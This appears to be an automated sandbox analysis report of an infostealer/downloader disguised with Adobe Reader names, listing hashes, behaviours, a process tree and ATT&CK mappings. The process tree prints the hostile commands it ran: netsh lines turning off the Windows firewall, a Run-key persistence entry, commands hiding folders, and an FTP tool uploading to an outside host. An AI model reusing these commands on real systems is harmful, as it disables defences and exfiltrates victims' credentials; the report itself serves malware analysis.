Analysis
-
max time kernel
139s -
max time network
124s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
27-08-2024 17:43
Static task
static1
Behavioral task
behavioral1
Sample
c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe
-
Size
4.5MB
-
MD5
c56ba0ec71222ed7354dfaafec5cf766
-
SHA1
4922a8e60d98cb595d7e854355e9e78bb1894a61
-
SHA256
7115ea1ab97a7187b2a1bb6936fe3df44bc754ec06f70c9f880d9787e605ea60
-
SHA512
97492c5e70d7dc989e3f3a1e04a2e4afc23c5a69fbbfbb129cd2f830545fcb3bdbc5ecdb94adbb102c910d40e58564297311690a66fd945b0a497f1c02ce3d5e
-
SSDEEP
98304:Kke5WPFJWlki31xdKi+OTq9RvXODruQkckcE0VxTEJxvwPtQAfk6RwBvL0X:KWPFJob31gpeXuQkcNzVNUOHLwBj0X
Malware Config
Signatures
-
Banload
Banload variants download malicious files, then install and execute the files.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ adbr01.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ adbr02.exe -
Modifies Windows Firewall 2 TTPs 4 IoCs
pid Process 3136 netsh.exe 3200 netsh.exe 2248 netsh.exe 2260 netsh.exe -
Sets file to hidden 1 TTPs 6 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 2612 attrib.exe 4684 attrib.exe 3648 attrib.exe 4140 attrib.exe 920 attrib.exe 4352 attrib.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion adbr01.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate adbr01.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion adbr02.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate adbr02.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 8 IoCs
pid Process 3940 Adobeta.exe 1064 adbr01.exe 4368 adbr01.exe 1760 adbr02.exe 4588 adbr02.exe 3776 Adobeta.exe 3460 Adobeta.exe 408 BReader.exe -
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x0007000000023436-21.dat upx behavioral2/memory/3940-40-0x0000000000400000-0x000000000044C000-memory.dmp upx behavioral2/memory/3940-43-0x0000000000400000-0x000000000044C000-memory.dmp upx behavioral2/memory/3776-119-0x0000000000400000-0x000000000044C000-memory.dmp upx behavioral2/memory/3460-122-0x0000000000400000-0x000000000044C000-memory.dmp upx -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts adbr02.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lodhgyuuuf = "C:\\Users\\Admin\\AppData\\Roaming\\Adobe\\Adobe Inc\\AdobeRead\\aijw01.bat" reg.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 26 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BReader.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Adobeta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ipconfig.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language adbr02.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Adobeta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language adbr01.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language adbr02.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language adbr01.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Adobeta.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 4552 ipconfig.exe -
Modifies registry class 7 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{71E816AE-B6E7-34BA-0341-332B111F53E6} adbr01.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{71E816AE-B6E7-34BA-0341-332B111F53E6}\ = "EAPSIM Identity Task class" adbr01.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{71E816AE-B6E7-34BA-0341-332B111F53E6}\InprocServer32 adbr01.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{71E816AE-B6E7-34BA-0341-332B111F53E6}\InprocServer32\ = "%systemroot%\\SysWow64\\eapsimextdesktop.dll" adbr01.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{71E816AE-B6E7-34BA-0341-332B111F53E6}\InprocServer32\ThreadingModel = "Apartment" adbr01.exe -
Suspicious use of AdjustPrivilegeToken 10 IoCs
description pid Process Token: 33 4368 adbr01.exe Token: SeIncBasePriorityPrivilege 4368 adbr01.exe Token: 33 4368 adbr01.exe Token: SeIncBasePriorityPrivilege 4368 adbr01.exe Token: SeDebugPrivilege 4368 adbr01.exe Token: 33 4588 adbr02.exe Token: SeIncBasePriorityPrivilege 4588 adbr02.exe Token: 33 4588 adbr02.exe Token: SeIncBasePriorityPrivilege 4588 adbr02.exe Token: SeDebugPrivilege 4588 adbr02.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2596 wrote to memory of 1256 2596 c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe 85 PID 2596 wrote to memory of 1256 2596 c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe 85 PID 2596 wrote to memory of 1256 2596 c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe 85 PID 1256 wrote to memory of 1180 1256 WScript.exe 88 PID 1256 wrote to memory of 1180 1256 WScript.exe 88 PID 1256 wrote to memory of 1180 1256 WScript.exe 88 PID 1180 wrote to memory of 5088 1180 cmd.exe 95 PID 1180 wrote to memory of 5088 1180 cmd.exe 95 PID 1180 wrote to memory of 5088 1180 cmd.exe 95 PID 1180 wrote to memory of 4140 1180 cmd.exe 96 PID 1180 wrote to memory of 4140 1180 cmd.exe 96 PID 1180 wrote to memory of 4140 1180 cmd.exe 96 PID 1180 wrote to memory of 3648 1180 cmd.exe 97 PID 1180 wrote to memory of 3648 1180 cmd.exe 97 PID 1180 wrote to memory of 3648 1180 cmd.exe 97 PID 1180 wrote to memory of 920 1180 cmd.exe 98 PID 1180 wrote to memory of 920 1180 cmd.exe 98 PID 1180 wrote to memory of 920 1180 cmd.exe 98 PID 1180 wrote to memory of 4352 1180 cmd.exe 99 PID 1180 wrote to memory of 4352 1180 cmd.exe 99 PID 1180 wrote to memory of 4352 1180 cmd.exe 99 PID 1180 wrote to memory of 2612 1180 cmd.exe 100 PID 1180 wrote to memory of 2612 1180 cmd.exe 100 PID 1180 wrote to memory of 2612 1180 cmd.exe 100 PID 1180 wrote to memory of 4684 1180 cmd.exe 101 PID 1180 wrote to memory of 4684 1180 cmd.exe 101 PID 1180 wrote to memory of 4684 1180 cmd.exe 101 PID 1180 wrote to memory of 3496 1180 cmd.exe 102 PID 1180 wrote to memory of 3496 1180 cmd.exe 102 PID 1180 wrote to memory of 3496 1180 cmd.exe 102 PID 3496 wrote to memory of 2428 3496 WScript.exe 103 PID 3496 wrote to memory of 2428 3496 WScript.exe 103 PID 3496 wrote to memory of 2428 3496 WScript.exe 103 PID 2428 wrote to memory of 3940 2428 cmd.exe 105 PID 2428 wrote to memory of 3940 2428 cmd.exe 105 PID 2428 wrote to memory of 3940 2428 cmd.exe 105 PID 2428 wrote to memory of 5048 2428 cmd.exe 106 PID 2428 wrote to memory of 5048 2428 cmd.exe 106 PID 2428 wrote to memory of 5048 2428 cmd.exe 106 PID 2428 wrote to memory of 4552 2428 cmd.exe 107 PID 2428 wrote to memory of 4552 2428 cmd.exe 107 PID 2428 wrote to memory of 4552 2428 cmd.exe 107 PID 2428 wrote to memory of 1064 2428 cmd.exe 108 PID 2428 wrote to memory of 1064 2428 cmd.exe 108 PID 2428 wrote to memory of 1064 2428 cmd.exe 108 PID 1064 wrote to memory of 4368 1064 adbr01.exe 109 PID 1064 wrote to memory of 4368 1064 adbr01.exe 109 PID 1064 wrote to memory of 4368 1064 adbr01.exe 109 PID 1064 wrote to memory of 4368 1064 adbr01.exe 109 PID 1064 wrote to memory of 4368 1064 adbr01.exe 109 PID 1064 wrote to memory of 4368 1064 adbr01.exe 109 PID 1064 wrote to memory of 4368 1064 adbr01.exe 109 PID 1064 wrote to memory of 4368 1064 adbr01.exe 109 PID 1064 wrote to memory of 4368 1064 adbr01.exe 109 PID 1064 wrote to memory of 4368 1064 adbr01.exe 109 PID 1064 wrote to memory of 4368 1064 adbr01.exe 109 PID 1064 wrote to memory of 4368 1064 adbr01.exe 109 PID 1064 wrote to memory of 4368 1064 adbr01.exe 109 PID 1064 wrote to memory of 4368 1064 adbr01.exe 109 PID 1064 wrote to memory of 4368 1064 adbr01.exe 109 PID 1064 wrote to memory of 4368 1064 adbr01.exe 109 PID 1064 wrote to memory of 4368 1064 adbr01.exe 109 PID 1064 wrote to memory of 4368 1064 adbr01.exe 109 PID 1064 wrote to memory of 4368 1064 adbr01.exe 109 -
Views/modifies file attributes 1 TTPs 6 IoCs
pid Process 3648 attrib.exe 4140 attrib.exe 920 attrib.exe 4352 attrib.exe 2612 attrib.exe 4684 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\ZREA.vbs"2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1256 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\enikiol02.bat" /quiet /norestart"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1180 -
C:\Windows\SysWOW64\xcopy.exexcopy /y /h /e /r /k /c *.* "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\"4⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:5088
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead"4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:4140
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\AdobeR"4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:3648
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\ADBR\READER"4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:920
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER"4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:4352
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR"4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2612
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\RAdobe\RADBR\AREADER"4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:4684
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\nimiki09.vbs"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3496 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Adobe\Adobe INC\AadobeRead\enikiol03.bat" /quiet /norestart"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2428 -
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exeAdobeta.exe -x -x -x -d -nuttyhdff -s:nuttyhdff.nuttyhdff ftp.freehostia.com -nuttyhdff6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3940
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lodhgyuuuf" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\aijw01.bat"6⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:5048
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /all6⤵
- System Location Discovery: System Language Discovery
- Gathers network information
PID:4552
-
-
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exeadbr01.exe -f "011.011"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1064 -
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exeadbr01.exe -f "011.011"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4368
-
-
-
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exeadbr02.exe -f "112.112"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1760 -
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exeadbr02.exe -f "112.112"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4588
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode disable6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2248
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2260
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set profiles state off6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3136
-
-
C:\Windows\SysWOW64\netsh.exeNetSh Advfirewall set allprofiles state off6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3200
-
-
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exeAdobeta.exe -a -c -d -natpasv -s:870.afr ftp.freehostia.com6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3776
-
-
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exeAdobeta.exe -a -c -d -natpasv -s:sun.afr ftp.freehostia.com6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3460
-
-
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\BReader.exeBReader 53596⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:408
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Virtualization/Sandbox Evasion
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4B
MD5c2f09542b6c7daf4288f3524c8cebb18
SHA19430b21baf07f0d105b9ee5fdd9f868418454517
SHA25655d7808233c58f1606fff77eb382a02ed729bf5d8b2640fb313d0f7c91e970d4
SHA512dcc19cfbc78b78708ce2586228424194f846d80b6d072045baaf93559d20f71e809a4eb57e7dac3b4ea109d90aeb585d0b5438dc1dd7d34054c03aa6350d6672
-
Filesize
142B
MD584399b674a7da7acca7bd4d5562e0d31
SHA168d78af0cf71d50e6c510c70a0107a73a094c9b1
SHA256535743fffe09450b19356638f0a80a8978054fb497ad479544ca3fab39d89957
SHA512ffacffc2b208aadae8846417342fa49820abeff62c7a8a996f080befc87e7f06653692a766dd7ecb3dbb2b8719fd2a2e70ee183ba720501f89830827482759b9
-
Filesize
2KB
MD5e1471d5f84084508bea441e81b08800d
SHA1b4ad5b49e67e5f1020c3a6222b0f4d242f23c9df
SHA256716b236ef4cb870d1312dc191bf0b0491a1f3e2cc835b4f063fcff0c4877821c
SHA512a25fede07c6404f5e30417a2a2ad2843d9cd8fae31135c914c84585f02415dcc23831c6e248d0647212bb287bc29a836ff89685ddf5fcf02ed73b26bf4365ae3
-
Filesize
400B
MD551e38a852a05cc9718fa3f68041e9dad
SHA1dd4bee5a01be174c3fda9904c61cfb2c41ede71c
SHA256b6e9dcb02e18ec89d3e003c56fffab57b9afb032f89f5a7826b729311938b288
SHA512197fb341edd0185948ff9739368ab0bea74012e87c9d27a67a665af50be2df7d6305b336e16cd1cec04dcca330dbbf6103d942ca9796030eb0b67fd331bea675
-
Filesize
125B
MD52a48c0bef4fca10233a53f40feda48a5
SHA142e9c79e06fa255083f307c64c2e89cda323b026
SHA256d7e97baf9575e2f20698fc0538a4003abbd4fba46389072088ed54a8d2629d13
SHA512f4f009211f93b536ce52900e795cfdb2e40dbba94c70a1156c600c7a98caa9d58dcb19e5f81ad9845a0ea03650ff3bef1267ac02d11828484b8f35423811f7eb
-
Filesize
128KB
MD5f20a3059bc40437c8dac850095b076cc
SHA19b1d118b02ab9942e9fab659329b5556190b08a0
SHA2565c75cc6d95f79d1d4a1c83b03500dbdc9d9b0b1dacdb61bbf28caf62da366c98
SHA512d2a497929e8373fb7035601654e80ed05e73282d1a909429286e6afe18344819b3e173fc5fa4d12ef3deadb8d67000b245fb98e376e3fabc2544d0b1a693ee75
-
Filesize
124KB
MD51a1075e5e307f3a4b8527110a51ce827
SHA1f453838ed21020b7ca059244feea8579e5aa74ef
SHA256ddd90e3546e95b0991df26a17cf26fa2f1c20d6a1fd4ffccf1e9b3ec3d3810d5
SHA512b6b70c6cb3cdb05a69c75b86c1fa0fadb38de0391e1fa17daff7d12dfae2a9f483546d9bf1001ff622694fdf8a28b85cd30fc541c25be62df022d22ca17decc1
-
Filesize
519B
MD5d4773871db0e4b8cad180eab60250d3f
SHA15ce9259f9dea5985013c836c56ea6182a72c618a
SHA25664681ae62fc11970f670e0d82efe4eb581cc0312d5c21b3082d7ac507543f3a6
SHA5122b1ba8a8dc26ca4003cbe8e8d0920c571c5b39e5893bc1008d5a34bbbe4922812c2c8048df76ad28fa153bcaa236e890829c59596360494082dcf2a9ee9bac45
-
Filesize
2.4MB
MD54d432bd0929e1fad42c98584dda0b9f5
SHA1c3381e2205b1e3493e28528cc3f18798c3ba5223
SHA256ffadb8953d9f92020fb9bb1d31d58aa73383ba83f8b8e762802048db2171e58c
SHA512bc5d8b1f6f1be46e91ca868320fde9fd0d9311710183e052adc7d112ec5ef42efd222d38dfea7e7292a882254ad5ff0f0dd6a6f0d6b7c8f957a23140111b9750
-
Filesize
2.2MB
MD5a754735e5ac70d33fd528b079e503ff9
SHA1d8a0069a07e9b6bd4f07eae04de331cd60f85eb8
SHA25686f299063483f6134e634d6b356eb38a8e6a779cd0f3d495d49683c0cc9e8e24
SHA512fed49537700f73abbb4cf7716d03c28010f5f69d280dc188c44c1826927f1ed247238d0983267b037a3b22a69c8668c27d3ccaa0618e303c8d930f4ccc281d9d
-
Filesize
205B
MD5426de1728c46d6b08f9ad56cf08ab872
SHA1215e41275f0a1204b3c896f7efbc49700b353950
SHA256bad31ec72d26efc643a53a2a838e14f179d3242cd6e4f85a16a0b95b17015684
SHA5129a7131b6edb1e5c2deaafd3286077af939c0abaa7a83bbd19f85de52e56a0dabd9d657281ccc026553ee8e12a6fa49fd8b95a3bcc83bb7a84b48588f25b74a4e
-
Filesize
923B
MD5d363e3b328794fe3bb4c7161b912da38
SHA1ea54f834acb70088ca03599591f20c41815b4a60
SHA25658ed7e647f6d356847c9e9a39fcfa9d5bd6dd7409a402b2162926f635f93983c
SHA5126e5f5404e78fd968c9d7f9e2dff3dbff0252dae17af70c1bc0e4589e892dca49fb9cdf3f932b1922137411bc754cc048edd71fe014dc4d93731c695bddffe61a
-
Filesize
1KB
MD5fd7c0388ca12d5d72cbdc97994d59d40
SHA1655221c41dfdc27631d4b738138bb32680022aea
SHA2568e7846031b9c738440e55b6ab1d481c17610a330d82d5467761c7e8fbf6ba38a
SHA512d6a77f0387aeae78ff929c16f0aeea82df93e81eaafcb20e05d3c080602d1fd670a5b84da9cafb031b7a546682171c54931c388734627185019c2eed5fff20e9
-
Filesize
548B
MD52246aa37b209d0f04831b3f7d9a61edc
SHA100899b4b33f264afef734f622a1cf2bf8564dd02
SHA256e0e34a17e7ac66b91149f3d744d9d765f8bc30bafe7a11c9e1cb13f881768c6d
SHA512d97935c3afe6c85cc3212ae8b8bf47dfeb108c1c79690b453efbcfde1212e7d10a379331c4d7f67be773f8d36f954ac8516ba629f86a7345ba017f63daff90cd
-
Filesize
122B
MD51fea6d4df76fb51523a03436c2a047fd
SHA16253e8fafc9cd795f72bc3aa9b988774bfb7c5d1
SHA256497f1dbd7a649f47bbd645b89be11de834a499766d239623000530d751cc83e7
SHA5125d05608daa4c6d9ac4b25fdc7df15831efbc571b594c12eada8d4b5c9a9ffe34426fc2ba0af4f7bf47253f3829077270cfb7f85cffbfb1eae12ad2bc27bba4d1